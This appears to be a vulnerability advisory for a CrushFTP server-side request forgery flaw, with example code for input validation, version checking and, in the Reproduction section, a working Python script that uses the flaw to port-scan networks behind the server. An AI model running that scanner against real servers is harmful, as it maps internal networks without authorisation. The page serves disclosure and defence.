CrushFTP Server-Side Request Forgery Vulnerability

Vulnerability

CrushFTP versions 9.x, 10.x prior to 10.8.4, and 11.x prior to 11.3.1 contain a server-side request forgery (SSRF) vulnerability. The 'host' and 'port' parameters of a 'command=telnetSocket' request to the '/WebInterface/function/' URI are used for an outbound connection without being validated or restricted, so an attacker who can reach that endpoint can make the server connect to a host and port of their choosing. Because the response reveals whether the connection succeeded or was refused, the endpoint can be used to scan ports on any network reachable from the server, including hosts the attacker cannot reach directly.
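The check the paragraph above says is missing, as an added example rather than CrushFTP's own code or its vendor fix: before an outbound-connect feature such as 'telnetSocket' opens a socket, the requested host is resolved and rejected if any resulting address is loopback, private, link-local, multicast, reserved or unspecified, and the port is compared against an allow-list. The allow-list contents, the function names and the injectable resolver are assumptions made for this illustration.

```python
import ipaddress
import socket

# Added example, not CrushFTP code. Hypothetical allow-list of destination
# ports an outbound-connect feature is permitted to reach.
ALLOWED_PORTS = {23, 992}


def validate_port(port_value):
    """Return the port as int if it is in range and allow-listed, else raise ValueError."""
    try:
        port = int(port_value)
    except (TypeError, ValueError):
        raise ValueError("port must be an integer")
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    if port not in ALLOWED_PORTS:
        raise ValueError("port %d not in allow-list" % port)
    return port


def resolve_and_check_host(host, resolver=socket.getaddrinfo):
    """Resolve 'host' and reject any address in a non-routable range.

    Returns the list of acceptable IP address strings. 'resolver' takes the
    place of socket.getaddrinfo so the check can run offline in tests.
    """
    if not host or len(host) > 253:
        raise ValueError("invalid host")
    # Numeric hosts are checked directly, without a DNS lookup.
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        addrs = []
        for _family, _type, _proto, _canon, sockaddr in resolver(host, None):
            # Drop an IPv6 scope suffix such as '%eth0' before parsing.
            addrs.append(ipaddress.ip_address(sockaddr[0].split("%")[0]))
    if not addrs:
        raise ValueError("host did not resolve")
    for a in addrs:
        if (a.is_loopback or a.is_private or a.is_link_local
                or a.is_multicast or a.is_reserved or a.is_unspecified):
            raise ValueError("host resolves to a non-routable address: %s" % a)
    return [str(a) for a in addrs]


def check_telnet_target(host, port_value, resolver=socket.getaddrinfo):
    """Validate both parameters; return (ip_list, port) or raise ValueError."""
    port = validate_port(port_value)
    addrs = resolve_and_check_host(host, resolver)
    return addrs, port
```

The caller must then connect to one of the returned addresses rather than re-resolving the hostname, otherwise a second DNS answer (rebinding) can point the socket at an internal address after the check has passed. Note that Python's ipaddress module treats the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) as private, so they are rejected here as well.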

Impact

Exploitation results in server-side request forgery: the attacker causes the CrushFTP server to open connections to internal or external resources on their behalf. The immediate effect is port scanning of networks reachable from the server, which exposes which internal services exist and can contribute to unauthorized access or information disclosure.

Reproduction

To reproduce this vulnerability, send a POST request to 'http://<target>:<port>/WebInterface/function/' with the 'command' parameter set to 'telnetSocket' and the 'host' and 'port' parameters set to the address and port the server should connect to. The response differs depending on whether the connection was established or refused, so repeating the request with the same 'host' and a range of 'port' values maps which ports are open from the server's point of view.
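The reproduction request above as a script, added here as an example and not taken from the original page or from CrushFTP. It builds the POST body, sends it to a target, and groups probed ports by the exact (status, body) the server returned; because the page does not state the response text for a connected versus refused socket, the scanner assumes nothing about marker strings and leaves the comparison of the groups to the operator. The function names, the injectable 'sender' and the ports in the main block are assumptions made for this illustration.

```python
import http.client
import urllib.parse

# Added example, not CrushFTP code.
FUNCTION_PATH = "/WebInterface/function/"


def build_probe(host, port):
    """Return (path, headers, body) for a telnetSocket request asking the
    server to connect to host:port."""
    body = urllib.parse.urlencode({
        "command": "telnetSocket",
        "host": host,
        "port": str(port),
    })
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": str(len(body)),
    }
    return FUNCTION_PATH, headers, body


def send_probe(target, target_port, host, port, timeout=5.0):
    """Send one probe to http://target:target_port and return (status, body)."""
    path, headers, body = build_probe(host, port)
    conn = http.client.HTTPConnection(target, target_port, timeout=timeout)
    try:
        conn.request("POST", path, body=body, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()


def scan_ports(target, target_port, host, ports, sender=send_probe):
    """Probe each port in 'ports' and group them by the (status, body) the
    server returned. Ports in different groups were handled differently by the
    server (for example connected versus refused). 'sender' can be replaced to
    exercise the grouping offline."""
    groups = {}
    for p in ports:
        key = sender(target, target_port, host, p)
        groups.setdefault(key, []).append(p)
    return groups


if __name__ == "__main__":
    import sys
    # Usage: python probe.py <target> <target_port> <host-to-scan> [ports...]
    target, target_port, host = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    ports = [int(p) for p in sys.argv[4:]] or [21, 22, 23, 80, 443, 8080]
    for (status, body), members in scan_ports(target, target_port, host, ports).items():
        print("status %s, body %r -> ports %s" % (status, body[:80], members))
```

Run it only against systems you are authorized to test. A useful first pass is one port you know is closed on the chosen host and one you know is open: the two responses then give you the server's own 'refused' and 'connected' signatures, and every other port falls into one of those groups.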

Remediation

Users are advised to update to a fixed release: 10.8.4 or later on the 10.x branch, or 11.3.1 or later on the 11.x branch. All 9.x releases are listed as affected, so 9.x installations should be moved to one of those fixed branches. Until the update is applied, limiting network access to the '/WebInterface/' endpoint reduces exposure.
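A version check against the ranges stated in this advisory, added here as an example rather than anything shipped by CrushFTP. It returns True for an affected version, False for a fixed one, and None for a major version the advisory does not cover. The parser ignores any text after the numeric part of the version string (for example a build suffix); that handling, and the function names, are assumptions made for this illustration.

```python
import re

# Added example, not CrushFTP code. First fixed release per major branch,
# taken from the ranges stated in this advisory.
FIXED = {10: (10, 8, 4), 11: (11, 3, 1)}


def parse_version(text):
    """Return (major, minor, patch) ints from a dotted version such as '10.8.3'.

    Missing minor/patch components count as 0; anything after the numeric
    part (e.g. a build suffix) is ignored. Assumption for this example.
    """
    m = re.match(r"\s*(\d+)(?:\.(\d+))?(?:\.(\d+))?", text)
    if not m:
        raise ValueError("unrecognised version: %r" % text)
    return tuple(int(g) if g is not None else 0 for g in m.groups())


def is_affected(text):
    """True if the version is in an affected range, False if fixed,
    None if the major version is not covered by this advisory."""
    major, minor, patch = parse_version(text)
    if major == 9:
        return True  # every 9.x release is listed as affected
    if major in FIXED:
        return (major, minor, patch) < FIXED[major]
    return None
```

Tuple comparison does the right thing for multi-digit components, so 10.10.0 is correctly reported as fixed even though a string comparison would place it before 10.8.4.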

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

Category         Score
spread           1.0
impact           1.3
exploitability   6.8
remediation      7.7
relevance        0.0
threat           6.4
urgency          2.9
incentive        1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.